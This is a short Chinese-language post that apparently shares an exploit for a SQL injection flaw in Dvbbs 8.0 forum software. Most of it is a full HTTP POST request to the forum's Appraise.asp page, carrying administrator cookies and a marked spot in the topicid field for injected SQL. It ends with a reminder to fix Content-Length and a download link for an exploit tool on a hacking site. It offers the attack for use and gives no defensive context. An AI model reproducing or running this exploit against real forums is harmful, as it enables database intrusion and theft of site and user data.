动网8.0sql最新注入漏洞+利用工具
POST /Appraise.asp?action=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://bbs.xxx.com... eplyID=5&skin=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: bbs.xxx.com
Content-Length: 163
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=userid=1&usercookies=0&userclass=%B9%DC%C0%ED%D4%B1&username=admin&userhidden=2&password=r84y6115O3q4tPFJ&StatUserID=4419358; w0802=21; rtime=0; ltime=1183993930108; w08_eid=70836889-http%3A//bbs.xxx.com/index.asp%3Fboardid%3D2; ASPSESSI; upNum=0; geturl=%2Fdispbbs%2Easp%3Fboardid%3D2%26ID%3D2%26replyID%3D2%26skin%3D1; Dvbbs=ciffahcie
boardid=2&announceid=5&atype=0&a1=0&a2=0&atitle=thenines&acodestr=3361&ac&topicid=41(这里就加sql注入语句啦)

别忘记修改Content-Length

注：工具下载地址http://www.hackerspirit.com/attachments/month_0708/72007815131341.rar